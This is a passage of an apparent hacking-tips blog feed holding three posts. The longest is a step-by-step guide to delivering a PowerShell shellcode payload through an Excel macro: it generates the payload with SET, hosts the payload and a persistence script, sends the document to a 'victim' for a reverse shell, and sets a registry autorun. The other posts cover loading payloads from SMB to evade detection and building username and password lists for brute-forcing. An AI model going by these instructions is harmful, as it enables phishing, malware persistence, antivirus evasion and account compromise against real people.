&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzZBo4qvdHCm6XW-Ib10mtWezt3rXKpPk0CzFkzZW-qD-G7oiCzAOqzkQKIe-apwDmdfk5iCohFLTjWTTA9gaOiAwKllEdRke_YCWJPnzqBZuaQi4-fJgDvObzQUsQ9wIuP3sPGJw17pP/s1600/Screenshot-7.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Veil-Catapult-cleanup-script&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzZBo4qvdHCm6XW-Ib10mtWezt3rXKpPk0CzFkzZW-qD-G7oiCzAOqzkQKIe-apwDmdfk5iCohFLTjWTTA9gaOiAwKllEdRke_YCWJPnzqBZuaQi4-fJgDvObzQUsQ9wIuP3sPGJw17pP/s1600/Screenshot-7.png&quot; height=&quot;135&quot; title=&quot;Veil-Catapult-cleanup-script&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
You can also host exe using temporary SMB server.This will load the payload executable into memory without touching disk,
 allowing otherwise disk-detectable executable to bypass detection&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Alternatives of Veil-Catapult are &lt;a href=&quot;http://www.pentestgeek.com/2013/10/23/smbexec-2-0-released&quot;&gt;smbexec&lt;/a&gt;&amp;nbsp; and &lt;a href=&quot;http://bernardodamele.blogspot.in/2009/12/keimpx-in-action.html&quot;&gt;keimpx&lt;/a&gt;.
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/687479999248679230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/687479999248679230'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/687479999248679230'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html' title='How to install and use Veil-Catapult in backtrack?'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3S2kzn-5H0xK9HHRFGuHrtlKhfzLuYZ7h4L_UJpl_buHam52jHxdt6wnKq7wnI__0nNuUAsBeoPgttmQb9saaBVW-kZZPyaVvxmZ-ZzmPijuB4lYLvlr7XNRz3_151AakLTqPbFk4ZHY/s72-c/Screenshot-1.png" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3963508405192026569</id><published>2014-01-06T19:27:00.000+05:30</published><updated>2014-01-11T15:15:43.833+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="bypass AV"/><title type='text'>Deliver powershell payload using macro.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
In past we saw method of &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html&quot;&gt;direct shell code execution in Ms word or Excel using macro&lt;/a&gt;;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Advantages of this method:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
(1)&lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html&quot;&gt;Persistence&lt;/a&gt;&lt;br /&gt;
(2)Migration is not needed&lt;br /&gt;
(3)&lt;a href=&quot;http://tipstrickshack.blogspot.com/search/label/bypass%20AV&quot;&gt;AV bypass&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(1)First we will generate powershell payload; for this purpose i used SET.You can also used &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot;&gt;Veil&lt;/a&gt; or powersploit.Open SET in terminal &amp;amp; select Social-Engineering Attacks and then Powershell Attack Vectors.Generate Powershell Alphanumeric Shellcode Injector.Fill LHOST &amp;amp; LPORT value.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEqsHbiEBlAJhMMIYNofyt0zw122yklXQTMrPRQ5qL1JHGzyv5K_ypHSh911Vz2rnJR6j6H0UtsALUVi-eEXbfhWiEWIgIXd6c3v44Zglc3IT4N38JbzEGuGS9umY2zqY8NMVcCGD1x9FL/s1600/set-powershell-payload.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;SET-powershell-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEqsHbiEBlAJhMMIYNofyt0zw122yklXQTMrPRQ5qL1JHGzyv5K_ypHSh911Vz2rnJR6j6H0UtsALUVi-eEXbfhWiEWIgIXd6c3v44Zglc3IT4N38JbzEGuGS9umY2zqY8NMVcCGD1x9FL/s1600/set-powershell-payload.png&quot; height=&quot;178&quot; title=&quot;SET-powershell-payload&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Our generated powershell payload is located into /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
(2)Now Clone git repository of code&lt;br /&gt;
&lt;br /&gt;
root@bt:~# &lt;u&gt;git clone https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery&lt;/u&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
root@bt:~# &lt;u&gt;cd Powershell-payload-Excel-Delivery/&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
(3)In Powershell-payload-Excel-Delivery folder; rename RemovePayload.bat to remove.bat. Now you have to host remove.bat and x32.ps1 to web-server.Then open persist.vbs file and change URL of x32.ps1 in line 13,33 to your hosted x32.ps1 `s URL. And now also host persist.vbs to web-server. I used localhost.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipyr-vSILryOqttFPY2he_AkQbYX65iOycKOcSxTmXa7Z-LkvtoZ7-NKI7f-tcafrUFgrtlJK5iNzA-xcRvVbbdKquHzDnC7NWW0_Bq1tsfK_r-1POIVEf2dnwEnKG17ks-vhI_ksHNDGT/s1600/host-on-local-server.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;hosted-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipyr-vSILryOqttFPY2he_AkQbYX65iOycKOcSxTmXa7Z-LkvtoZ7-NKI7f-tcafrUFgrtlJK5iNzA-xcRvVbbdKquHzDnC7NWW0_Bq1tsfK_r-1POIVEf2dnwEnKG17ks-vhI_ksHNDGT/s1600/host-on-local-server.png&quot; height=&quot;62&quot; title=&quot;hosted-payload&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
(4)Open Macrocode file from cloned folder &amp;amp; change URL in line 27,82,118 respectively to your hosted x32.ps1,persist.vbs and remove.bat `s URL.Now add this macro code into excel document as mentioned in &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html&quot;&gt;previous tutorial&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
(5)And last step is setup listener.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjab_IdVYNthFVMkcXF8dwyhAaJ2CuX2JCfVD1ZtOPlLHC_Eo1o8b_pY-6mjW6b73WT-GThOdKzPnR-ZJzMXRSg-v3-PCJlYy1FqKL-hJd9Q2Efj2ctWU5hQaNB5373Suxgw3OeuGo0TSh4/s1600/metasploit-lisetner.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;metasploit-listener&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjab_IdVYNthFVMkcXF8dwyhAaJ2CuX2JCfVD1ZtOPlLHC_Eo1o8b_pY-6mjW6b73WT-GThOdKzPnR-ZJzMXRSg-v3-PCJlYy1FqKL-hJd9Q2Efj2ctWU5hQaNB5373Suxgw3OeuGo0TSh4/s1600/metasploit-lisetner.png&quot; height=&quot;139&quot; title=&quot;metasploit-listener&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Now send this document to victim , as soon as he open document and run macro we will get shell. Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjFlCBJbdcrvIXVY7Fhh8UcqS6s9k-jCEsQA7AQXWXt2pXKwTwTMf7Asn1Wh3KNKlJXZ2G2ZHJI4bfqVbng0MHhv9SfJ2zDr9iT96nY14coyEEb7_lbORGRSvar4Mzsm-6gA33Uw4YnPra/s1600/powershell-process.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;powershell-process&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjFlCBJbdcrvIXVY7Fhh8UcqS6s9k-jCEsQA7AQXWXt2pXKwTwTMf7Asn1Wh3KNKlJXZ2G2ZHJI4bfqVbng0MHhv9SfJ2zDr9iT96nY14coyEEb7_lbORGRSvar4Mzsm-6gA33Uw4YnPra/s1600/powershell-process.png&quot; height=&quot;150&quot; title=&quot;powershell-process&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmUBNGRfhYxAZ8VyMO6lP0xC7NwKqakWyxWKMEsu1rUrYcH8C_6UkEFRgp8igU8eQOThlijh2jXjucfEbHuIWjAicMsb1nDSRgJfN4P-5Fhkj9nROl-tjNO7CwHQTDK_WEgrXSX77o-pir/s1600/regedit.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;persist using regestiry&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmUBNGRfhYxAZ8VyMO6lP0xC7NwKqakWyxWKMEsu1rUrYcH8C_6UkEFRgp8igU8eQOThlijh2jXjucfEbHuIWjAicMsb1nDSRgJfN4P-5Fhkj9nROl-tjNO7CwHQTDK_WEgrXSX77o-pir/s1600/regedit.png&quot; height=&quot;164&quot; title=&quot;persist using regestiry&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Thanks to&amp;nbsp; &lt;a href=&quot;https://twitter.com/enigma0x3&quot;&gt;enigma0x3&lt;/a&gt; for this awesome method.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;Update&lt;/span&gt; :- &lt;span style=&quot;font-weight: normal;&quot;&gt;New-Powershell-Payload-Excel-Delivery&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt;This is a VBA macro that uses Matt Graeber&#39;s Invoke-Shellcode to execute a powershell payload in memory as well as schedule a task for persistence(20 min onidle&amp;nbsp; you get shell).&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
root@bt:~# &lt;u&gt;git clone https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git&lt;/u&gt;&lt;br /&gt;
root@bt:~# &lt;u&gt;cd Powershell-Payload-Excel-Delivery/&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Open MacroCode file &amp;amp; change Download URL for Invoke-Shellcode file &amp;amp; change LHOST &amp;amp; LPORT option. Now add macro-code in Excel file &amp;amp; start-up listener. &lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3963508405192026569/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3963508405192026569'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3963508405192026569'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html' title='Deliver powershell payload using macro.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEqsHbiEBlAJhMMIYNofyt0zw122yklXQTMrPRQ5qL1JHGzyv5K_ypHSh911Vz2rnJR6j6H0UtsALUVi-eEXbfhWiEWIgIXd6c3v44Zglc3IT4N38JbzEGuGS9umY2zqY8NMVcCGD1x9FL/s72-c/set-powershell-payload.png" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-1202952053323807212</id><published>2013-12-18T14:04:00.000+05:30</published><updated>2013-12-18T16:42:55.205+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Brute Force"/><title type='text'>Creating custom username list &amp; wordlist for bruteforciing.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
During brute-forcing every time you need custom&amp;nbsp; password list &amp;amp; username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html&quot;&gt;username enumeration&lt;/a&gt;.&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Creating custom username list:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
(1)&lt;a href=&quot;https://github.com/pentestgeek/jigsaw&quot; target=&quot;_blank&quot;&gt;Jigsaw&lt;/a&gt;:-&lt;/div&gt;
&lt;br /&gt;
During &lt;a href=&quot;http://tipstrickshack.blogspot.com/search/label/Information%20Gathering&quot;&gt;information gathering&lt;/a&gt; stage , you may use jigsaw script. It is great script for gathering employees `s details like fullname, position, department, email addresses.You should use script with your jigsaw credential.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiw8uPhy3lTa0Xrvwogv3Acl28BXuTCqkQM6UC_Q1QyFuKcEImb3oX29GpTcRSvjdLOKr9S8vivZhOGw-oBTEXoQiTRsU6ap1ndBTIPmfZrXsRwTRAyqrHi_aEUb3UmvEEh9FY6eTdVlus/s1600/jigsaw.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;99&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiw8uPhy3lTa0Xrvwogv3Acl28BXuTCqkQM6UC_Q1QyFuKcEImb3oX29GpTcRSvjdLOKr9S8vivZhOGw-oBTEXoQiTRsU6ap1ndBTIPmfZrXsRwTRAyqrHi_aEUb3UmvEEh9FY6eTdVlus/s320/jigsaw.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
some times email address`s initial can be username of employee.So you can get different username from output of jigsaw script.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AXp03FECRXgJY4WoYuqv8WHsPnK-SYlqvihyhPq2UtfptvP6PzA321hbeK0MlDlnTgexLrCmLS7PwssdZ9z4VWHwYTO7zJG1tCuNcUBG1R6v_dEvZE4e1djn7FVSK1wAIyAOCR0mz0KR/s1600/jigsaw-3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AXp03FECRXgJY4WoYuqv8WHsPnK-SYlqvihyhPq2UtfptvP6PzA321hbeK0MlDlnTgexLrCmLS7PwssdZ9z4VWHwYTO7zJG1tCuNcUBG1R6v_dEvZE4e1djn7FVSK1wAIyAOCR0mz0KR/s320/jigsaw-3.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
(2)Username script:-&lt;br /&gt;
&lt;br /&gt;
If you have full name of users then you can use &lt;a href=&quot;http://blog.techorganic.com/2011/07/creating-user-name-list-for-brute-force.html&quot;&gt;username.py&lt;/a&gt; script to generate possible username by using different combination of first name &amp;amp; last name.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Vi6jGZ1qZ-lVLWG24alEHyJiWVVXwTOHnpDuUnNXcdVYKiozhyg7QXaTkIlWymWL6y-KfWj1C3zlUQWmbdr0WwynwiwCeqo17vDlN7srOhgUfoyVjkyelY6JvQRR7Z7jKlMFuV4UX2E5/s1600/username.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Vi6jGZ1qZ-lVLWG24alEHyJiWVVXwTOHnpDuUnNXcdVYKiozhyg7QXaTkIlWymWL6y-KfWj1C3zlUQWmbdr0WwynwiwCeqo17vDlN7srOhgUfoyVjkyelY6JvQRR7Z7jKlMFuV4UX2E5/s320/username.PNG&quot; width=&quot;308&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I also write &lt;a href=&quot;http://pastebin.com/wzuUYPve&quot;&gt;bash script&lt;/a&gt; which generate possible username using first name, last name &amp;amp; birth date.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTOL5MFk5L1AKttiTYXZfP3YIRXC6rjqXqaU8iSkw0WW4-J5bpaI88D13n8QiysQtDxYOu09K6jBEZ-swIFw7hD7p0ccEuRXPymmtypFXECcoDJfcH5eDjie6zNYtNCj9X_wozcf5oDShW/s1600/user-name.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTOL5MFk5L1AKttiTYXZfP3YIRXC6rjqXqaU8iSkw0WW4-J5bpaI88D13n8QiysQtDxYOu09K6jBEZ-swIFw7hD7p0ccEuRXPymmtypFXECcoDJfcH5eDjie6zNYtNCj9X_wozcf5oDShW/s320/user-name.PNG&quot; width=&quot;199&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Creating Custom word list:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
(1)&lt;a href=&quot;http://www.digininja.org/projects/cewl.php&quot;&gt;Cewl&lt;/a&gt;:-&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Custom Word List generator. &lt;a href=&quot;http://www.digininja.org/projects/cewl.php&quot;&gt;CeWL&lt;/a&gt; is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPNHnJWW46hTB34U39bHDbR8ABCsZSByKEBtR87fX4rd3R_0FYPCWupAB-Z1NYZWhHQy1hL1_jpmH0m-PJlHqgJjHsYkKsV5d1cnb93pdNLiox1t00ra81-c6C-Y0JVtLuiaif31KB7m-B/s1600/cewl.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;39&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPNHnJWW46hTB34U39bHDbR8ABCsZSByKEBtR87fX4rd3R_0FYPCWupAB-Z1NYZWhHQy1hL1_jpmH0m-PJlHqgJjHsYkKsV5d1cnb93pdNLiox1t00ra81-c6C-Y0JVtLuiaif31KB7m-B/s320/cewl.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
(2)&lt;a href=&quot;http://www.remote-exploit.org/content/wyd-0.2.tar.gz&quot;&gt;Wyd&lt;/a&gt;:-&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.remote-exploit.org/content/wyd-0.2.tar.gz&quot;&gt;wyd&lt;/a&gt; is a password profiling tool that extracts words/strings from supplied files and directories. It parses files according to the file-types and extracts the useful information, e.g. song titles, authors and so on from mp3&#39;s or descriptions and titles from images.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmyObraj8Oq83aRRxk3oE5yuyW9lMtHRrgqrPXhqP43xsg9e9BHO_VEJ8duf56YGEBZY6R9Ki9X4M6T7XOp41M8x533opo8H3JLS5RM0dRPgyp7aqh-HbOPZado8g1gmmG17lKRpzTMaL/s1600/wyd.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;144&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmyObraj8Oq83aRRxk3oE5yuyW9lMtHRrgqrPXhqP43xsg9e9BHO_VEJ8duf56YGEBZY6R9Ki9X4M6T7XOp41M8x533opo8H3JLS5RM0dRPgyp7aqh-HbOPZado8g1gmmG17lKRpzTMaL/s320/wyd.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
(3)&lt;a href=&quot;http://www.remote-exploit.org/content/cupp-3.0.tar.gz&quot;&gt;Cupp&lt;/a&gt;:-&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
People spend a lot of time preparing for effective dictionary attack. &lt;a href=&quot;http://www.remote-exploit.org/content/cupp-3.0.tar.gz&quot;&gt;Common User Passwords Profiler (CUPP)&lt;/a&gt; is made to simplify this attack method that is often used as last resort in penetration testing and forensic crime investigations. A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggaZPrlz025R-Od0zRAb85wrI5JoPXckP2LmLkcpnlwendIMS4tb2lEAJ-dLnkUC0n8a8v_W4kcvExzfoSH_abl1TChzbfdKTXf0YmsB878XgAGY-wGu8FaR1Mfil5yFFm0j3r-rdbB72M/s1600/cupp.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggaZPrlz025R-Od0zRAb85wrI5JoPXckP2LmLkcpnlwendIMS4tb2lEAJ-dLnkUC0n8a8v_W4kcvExzfoSH_abl1TChzbfdKTXf0YmsB878XgAGY-wGu8FaR1Mfil5yFFm0j3r-rdbB72M/s320/cupp.PNG&quot; width=&quot;303&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/1202952053323807212/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/1202952053323807212'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/1202952053323807212'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html' title='Creating custom username list &amp; wordlist for bruteforciing.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 